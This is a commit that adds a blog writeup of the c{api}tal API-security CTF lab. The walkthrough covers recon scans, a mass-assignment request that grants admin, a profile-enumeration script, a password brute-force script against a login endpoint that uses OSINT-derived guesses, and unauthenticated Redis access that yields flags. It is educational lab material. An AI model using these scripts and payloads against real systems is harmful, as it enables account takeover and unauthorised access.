Update API pentest writeup with findings and flags

Revised content for API pentest writeup, including vulnerability details, findings, and flags captured.

Author: ahmed-fa7im

_posts/2026-02-01-api-pentest-writeup-capital-lab.md

@@ -0,0 +1,297 @@
+---
+title: "API Penetration Testing Writeup: c{api}tal LAB"
+date: 2026-02-01 14:00:00 +0200
+categories: [Penetration Testing, API Security]
+tags: [api]
+---
+
+In this writeup, I'll walk through the exploitation of the **c{api}tal LAB** CTF challenge, which covers multiple API security vulnerabilities including mass assignment, CORS misconfiguration, and weak authentication.
+
+## Initial Reconnaissance
+
+### Nmap Scan
+
+```bash
+sudo nmap -sC -sV -p- 10.183.255.149
+```
+
+The scan revealed several open ports:
+
+- **22/tcp**: SSH (OpenSSH 8.9p1)
+- **80/tcp**: Apache httpd 2.4.52 (User Management)
+- **111/tcp**: rpcbind
+- **4100/tcp**: Node.js Express framework (c{api}tal frontend)
+- **6379/tcp**: Redis key-value store 7.0.3
+- **8000/tcp**: Uvicorn (Python backend API)
+
+### Nikto Web Server Scan - Frontend (Port 4100)
+
+```bash
+nikto -h http://127.0.0.1:4100/
+```
+
+**Key findings:**
+- Missing X-Frame-Options header (clickjacking risk)
+- Missing X-Content-Type-Options header
+- CORS header: `Access-Control-Allow-Origin: *` (broad policy)
+- Possible WordPress installation detected
+
+### Nikto Web Server Scan - Backend (Port 8000)
+
+```bash
+nikto -h http://127.0.0.1:8000/
+```
+
+**Key findings:**
+- `Access-Control-Allow-Origin: *` (CORS misconfiguration)
+- Missing security headers (X-Frame-Options, X-Content-Type-Options)
+
+These findings indicate potential **API7:2019 (Security Misconfiguration)** and **API8:2019 (XSS)** vulnerabilities.
+
+## Mass Assignment
+
+### Discovery
+
+After registering and logging in through the frontend, I obtained a JWT token and tested the user update endpoint:
+
+```
+PUT http://127.0.0.1:8000/api/v2/users/login
+```
+
+### Exploitation
+
+By sending an additional `admin` property in the JSON request body:
+
+```json
+{
+  "user": {
+    "admin": true
+  }
+}
+```
+
+The API accepted the parameter and elevated my user privileges to admin!
+
+**Response:**
+```json
+{
+  "user": {
+    "username": "user1",
+    "email": "user1@example.com",
+    "bio": "flag{M4sS_AsS1gnm3nt}",
+    "image": null,
+    "admin": true,
+    "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIxIiwiZXhwIjoxNzY1ODkxNzI3LCJzdWIiOiJhY2Nlc3MifQ.WdCH6VZ4suM_2LUyIMICinSR9Vuzjeuha6W8oKISmwE"
+  }
+}
+```
+![Get Admin Privileges](https://www.notion.so/image/attachment%3Ab6a988b0-c1ba-463d-92d4-038fc134e6ed%3A1.jpg?table=block&id=2c47ff78-2f31-809f-b898-d71466c429ed&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=1330&userId=&cache=v2){: width="700" height="400" }
+**First Flag:** `flag{M4sS_AsS1gnm3nt}`
+
+**Root Cause:** The backend failed to whitelist properties when binding client-provided data to the user model.
+
+## Exploring the Application
+
+### Articles and Comments
+
+After gaining admin access, I explored the frontend at `127.0.0.1:4100` and discovered articles with comments. I found two comments on a selected article that I attempted to delete.
+![two comments](https://www.notion.so/image/attachment%3Affdacd8a-da98-4056-a92c-37f8ccd873f3%3A2.jpg?table=block&id=2c47ff78-2f31-805e-a110-f38fd7a29058&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+
+![delete comments](https://www.notion.so/image/attachment%3A0b01e191-16f7-4e64-ae59-f40480c45105%3A3.jpg?table=block&id=2c47ff78-2f31-8015-a94e-c71a81241bdf&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+for delete comment this is need two things `slug` and `commentId` 
+![to delete comments](https://www.notion.so/image/attachment%3A61284fcc-972d-4c4c-9c43-0129efa37a2e%3A4.jpg?table=block&id=2c47ff78-2f31-8098-be66-ecfdb981805f&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=890&userId=&cache=v2){: width="700" height="400" }
+
+### API Directory Enumeration
+
+Using feroxbuster to discover API endpoints:
+
+```bash
+feroxbuster -u http://127.0.0.1:8000/api/
+```
+
+**Discovered endpoints:**
+- `/api/users` (405 Method Not Allowed)
+- `/api/debug` (405 Method Not Allowed)
+- `/api/admin` (403 Forbidden - now accessible with elevated privileges)
+- `/api/user` (403 Forbidden)
+- `/api/tags` (200 OK)
+- `/api/membership` (405 Method Not Allowed)
+- `/api/logging` (403 Forbidden)
+
+With admin privileges, I was able to access the `/api/admin` and `/api/logging` endpoints.
+![access admin page](https://www.notion.so/image/attachment%3Ac7ecf113-a973-414b-82d1-03dd0834231a%3A5.jpg?table=block&id=2c47ff78-2f31-8078-b470-d927bcf431f4&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+![access logging](https://www.notion.so/image/attachment%3A2775a221-5145-4bc4-b485-2f66b4616cc2%3A6.jpg?table=block&id=2c47ff78-2f31-8060-a85c-edba4bf3205a&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+
+## User Enumeration
+
+### User Discovery via Profiles Endpoint
+
+The application exposed user profile information through:
+
+```
+GET /api/profiles/{username}
+```
+
+I identified the following users on the platform:
+- Bob_the_dev
+- Hodor
+- Pikachu
+- Ash Ketchum
+- Blastoise
+- TeamR$cket
+
+```python
+import requests
+import urllib.parse
+
+base_url = "http://127.0.0.1:8000/api/profiles/"
+token = "add your token here"
+headers = {
+    "Authorization": f"Token {token}",
+    "Content-Type": "application/json",
+    "Accept": "application/json"
+}
+
+users = [
+    "Bob_the_dev",
+    "Hodor",
+    "Pikachu",
+    "Ash Ketchum",
+    "Blastoise",
+    "TeamR$cket"
+]
+
+for user in users:
+    encoded_username = urllib.parse.quote(user)
+    url = base_url + encoded_username
+    print(f"\n===== Requesting profile: {user} =====")
+    print(f"URL: {url}")
+
+    try:
+        r = requests.get(url, headers=headers)
+        print("Status:", r.status_code)
+        print("Response:", r.text)
+
+    except Exception as e:
+        print("Error:", e)
+```
+![found credit card information](https://www.notion.so/image/attachment%3A06629db8-8d33-4906-9bef-60b816e15a54%3A8.jpg?table=block&id=2c47ff78-2f31-8044-bf16-d7047b95d636&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+
+i will add this data in membership endpoit using postman
+![found credit card information](https://www.notion.so/image/attachment%3A98b3b1e8-75f3-4097-94b1-190cc590e06c%3A9.jpg?table=block&id=2c47ff78-2f31-803a-b8f2-cf0fcab81949&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+
+
+## Weak Authentication & Brute Force
+
+### Intelligence Gathering
+
+While exploring articles, I found clues in the Pikachu user's profile:
+- Email: `Pikachu@checkmarx.com`
+- Personal information: References to Pokémon favorites
+
+```
+My favourites pokemon!
+flygon luxray garchomp gyarados absol ninetales torterra komala lurantis 
+charizard gengar arcanine bulbasaur dragonite Blaziken snorlax Mudkip 
+Jigglypuff ninetals squirtl
+```
+
+### Password Brute Force Attack
+
+The login endpoint lacked rate limiting, allowing brute force attacks. I compiled a password list from the Pokémon references and wrote a script:
+
+```python
+import requests
+import json
+
+url = "http://127.0.0.1:8000/api/v2/users/login"
+email = "Pikachu@checkmarx.com"
+
+with open("password_api_lab.txt", "r") as f:
+    passwords = f.read().splitlines()
+
+for pwd in passwords:
+    data = {
+        "user": {
+            "email": email,
+            "password": pwd
+        }
+    }
+
+    r = requests.post(url, json=data)
+
+    if "incorrect email or password" not in r.text.lower():
+        print(f"[+] FOUND PASSWORD: {pwd}")
+        print("Response:", r.text)
+        break
+    else:
+        print(f"[-] Wrong: {pwd}")
+```
+
+**Result:** Successfully cracked the Pikachu account password.
+![Password Brute Force Attack](https://www.notion.so/image/attachment%3Ab9029923-1316-4c97-93fc-c07c94636417%3A7.jpg?table=block&id=2c47ff78-2f31-8082-bda4-c93326cae36f&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+**Security Issue:** Lack of rate limiting on the login endpoint allowed rapid password attempts without lockout.
+
+## API Version Discovery
+
+### Fuzzing API Versions
+
+Using ffuf, I discovered multiple API versions:
+
+```bash
+ffuf -u http://127.0.0.1:8000/api/FUZZ/users/login -w versions.txt
+```
+
+**Discovered versions:**
+- `/api/v1/users/login` (405 Method Not Allowed)
+- `/api/v2/users/login` (405 Method Not Allowed)
+
+Both versions accepted POST requests for authentication, but API versioning suggests potential legacy endpoint vulnerabilities.
+![fuzz api version](https://www.notion.so/image/attachment%3A60c91668-0552-436d-9887-f1dbe6fcf0d2%3A10.jpg?table=block&id=2c47ff78-2f31-80b8-ba4e-ee428d86564d&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+## Lack of Resource and Rate Limiting
+
+The absence of rate limiting was evident throughout the API:
+- No attempt throttling on authentication endpoints
+- No request frequency limits
+- Enabled brute force attacks on user credentials
+
+in this case articles limit if this = number like 10000 or over the flag show in title
+![Resource and Rate Limiting](https://www.notion.so/image/attachment%3A558907d4-64b1-4cbe-87ab-50efbc3bbb79%3A11.jpg?table=block&id=2c47ff78-2f31-805a-aa00-c5ef6160ff6e&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+## API Documentation Exposure
+
+The `/docs` endpoint exposed comprehensive Swagger documentation at:
+
+```
+http://127.0.0.1:8000/docs
+```
+
+This allowed attackers to understand the full API structure and available endpoints without reverse engineering.
+
+## Debug Endpoints
+
+### Debug Endpoint Testing
+
+Through API enumeration, I discovered a `/debug` endpoint. Testing with parameter injection revealed potential RCE vulnerabilities.
+![RCE Vuln](https://www.notion.so/image/attachment%3A3dd71e8c-f739-4801-844e-d307cbf8fbf6%3A12.jpg?table=block&id=2c47ff78-2f31-80a0-8260-c93e82b689bc&spaceId=257977a9-15a6-476c-a79d-eab573892e22&width=950&userId=&cache=v2){: width="700" height="400" }
+
+## Unprotected Redis Instance
+
+### Redis Connection
+
+The Redis instance (port 6379) was exposed without authentication:
+
+```bash
+redis-cli -h 127.0.0.1 -p 6379
+127.0.0.1:6379> KEYS *
+1) "flag"
+127.0.0.1:6379> get flag
+"flag{5eC_M1sc0nF1g}"
+```
+
+**Second Flag:** `flag{5eC_M1sc0nF1g}`
+
+**Critical Issue:** Redis server was publicly accessible with no authentication, storing sensitive flag data and potentially application sessions or cache data.
+
+
+
+This challenge effectively demonstrated how multiple seemingly minor vulnerabilities can chain together to enable complete system compromise in API-driven applications.